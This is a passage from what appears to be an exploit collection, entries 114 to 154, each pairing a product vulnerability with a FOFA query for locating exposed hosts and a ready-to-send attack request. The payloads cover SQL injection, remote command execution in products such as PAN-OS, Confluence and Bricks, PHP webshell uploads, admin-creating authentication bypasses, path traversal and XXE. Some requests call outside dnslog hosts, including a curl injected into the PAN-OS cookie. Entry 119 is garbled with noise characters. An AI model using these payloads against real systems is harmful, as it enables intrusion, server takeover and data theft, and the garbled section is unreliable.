User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce value
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip

Step 2: substitute the nonce value and execute the command
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "<value obtained in step 1>",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}


116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png

----------767099171--


117. WordPress LayerSlider plugin SQL injection
Version: 7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

118. 北京百绰智能 (Beijing Baichuo) S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--


Then access /home/src.php

( l/ B! }2 \7 G9 R& [1 T% K5 o: D119. 北京百绰智能S20后台sysmanageajax.php sql注入- O7 ~' B' Q) D8 S+ z' R
CVE-2024-1254
, D$ V4 J) Z$ X. \, F. }9 u" nFOFA:title="Smart管理平台"/ Z7 R% H8 Q9 [+ K8 \6 E
先登录进入系统,默认账号密码为admin/admin! ~) B, T! Z7 a& J3 W! g
POST /sysmanage/sysmanageajax.php HTTP/1.11
% [& [4 M; H9 B* t* c2 fHost: x.x.x.x
/ U! n( s! Y( A6 u, eCookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
' E! y/ V' A, n5 CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
$ y' F1 V& N) ~9 nAccept: */*
7 V9 `+ w4 w g% y7 oAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
8 A2 Y) l8 X- z$ M0 ^Accept-Encoding: gzip, deflate
( a+ X5 A2 k5 W: K3 H6 wContent-Type: application/x-www-form-urlencoded;) p9 a8 O8 F$ |9 A9 k
Content-Length: 109- ^ i2 W4 C, `3 x f9 B; x
Origin: https://58.18.133.60:8443* r' p! [& n$ \2 M m
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
0 W; n2 s2 W/ t6 fSec-Fetch-Dest: empty/ ~7 X( u( x/ f6 Q* E Q* O; b/ {) ~3 J
Sec-Fetch-Mode: cors
6 S G2 W. x/ M5 l n! MSec-Fetch-Site: same-origin
; r7 P7 w7 J. O/ Z6 tX-Forwarded-For: 1.1.1.12 t) f0 y! H- d& @9 h3 G4 A
X-Originating-Ip: 1.1.1.1
7 r9 Z% D1 t/ O& Z _X-Remote-Ip: 1.1.1.1
, z( r; U& v* p5 g9 x; lX-Remote-Addr: 1.1.1.1# J/ a |+ f, k ~4 ?1 o! A: J
Te: trailers
a! t; \4 p! `3 ~ q9 n! w& LConnection: close3 `6 A/ w% Z. R" e
2 F& b; t! r) C0 Q8 Q/ L
src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456
6 w1 e& }1 @ w+ V' f. x/ c
7 F* u$ V5 q) ^# P; g3 T- _, H C' c
120. 北京百绰智能 (Beijing Baichuo) S40 management platform web.php import arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328--


File path: /upload/2.php

121. 北京百绰智能 (Beijing Baichuo) S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328--


File path: boot/web/upload/weblogo/1.php

122. Beijing Baichuo Smart (百绰智能) S200 management platform /importexport.php SQL injection
CVE-2024-27718
FOFA:title="Smart管理平台"
Here sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= is the SQL statement base64-encoded; decoded it reads sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

124. Hunan Jianyan (建研) engineering quality inspection system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

Uploaded file: http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

After the user is created, log in to the admin console directly; system commands can then be executed.

126. Aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

127. Glodon (广联达) Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]
>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

128. Adobe ColdFusion deserialization
CVE-2023-38203
Adobe ColdFusion 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier)
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read the /etc/passwd file
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Admin URL: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py

133. H5 Cloud Mall (云商城) file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. Netentsec (网康) NS-ASG application security gateway index.php SQL injection
CVE-2024-2330
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. Netentsec (网康) NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. Fujian Kelixun (科立讯) communication command and dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. Fujian Kelixun (科立讯) communication command and dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. Fujian Kelixun (科立讯) communication command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. Fujian Kelixun (科立讯) communication command and dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. Kelixun (科立讯) communication command and dispatch management platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- --

142. CMSV6 vehicle monitoring platform weak password
CVE-2024-29666
FOFA:body="/808gps/"
admin/admin

143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter carries the command to be executed
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
Accept-Encoding: gzip

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

147. RaidenMAILD mail server v4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

148. CrushFTP authentication bypass template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

153. Gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request /config to obtain the component ids
http://x.x.x.x/config

Step 2: write the contents of /etc/passwd into a temporary file
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.15 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: access
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. Tianweier (天维尔) fire rescue operations dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
